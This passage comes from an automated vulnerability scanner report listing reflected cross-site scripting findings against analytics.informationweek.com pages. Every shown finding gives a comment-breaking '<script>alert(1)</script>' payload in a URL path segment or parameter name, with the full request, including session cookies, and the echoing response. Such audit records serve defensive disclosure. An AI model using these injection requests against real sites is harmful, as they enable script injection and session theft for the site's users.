Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 55c09--><script>alert(1)</script>bf3e5338c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
55c09--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf3e5338c9e%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html">
...[SNIP]...

3.13. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload cf1ae--><script>alert(1)</script>980e8f9ba54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:21 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
mlcf1ae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E980e8f9ba54&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54">
...[SNIP]...

3.14. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c7d2--><script>alert(1)</script>6d9f708ac4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 53590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d9f708ac4a%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1">
...[SNIP]...

3.15. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 52fde--><script>alert(1)</script>8290483de10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3Ealert%281%29%3C%2Fscript%3E8290483de10%2F7%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html">
...[SNIP]...

3.16. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 42973--><script>alert(1)</script>454e510e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
t%3Ealert%281%29%3C%2Fscript%3E454e510e36f%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html">
...[SNIP]...

3.17. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4e97f--><script>alert(1)</script>fee00e08e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:02 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ript%3Ealert%281%29%3C%2Fscript%3Efee00e08e9%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html">
...[SNIP]...

3.18. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload e65d9--><script>alert(1)</script>d674e82b6c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
cript%3Ealert%281%29%3C%2Fscript%3Ed674e82b6c1%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html">
...[SNIP]...

3.19. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 21610--><script>alert(1)</script>20b72df1c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3Cscript%3Ealert%281%29%3C%2Fscript%3E20b72df1c4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4">
...[SNIP]...

3.20. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 39828--><script>alert(1)</script>2323f7bbb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 50339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
pt%3Ealert%281%29%3C%2Fscript%3E2323f7bbb5b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1">
...[SNIP]...

3.21. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 924e1--><script>alert(1)</script>07bb1c645bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
bb1c645bd%2F81%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...

3.22. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 354b7--><script>alert(1)</script>403b10a048c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
403b10a048c%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...

3.23. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e8b04--><script>alert(1)</script>6a5a5123e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
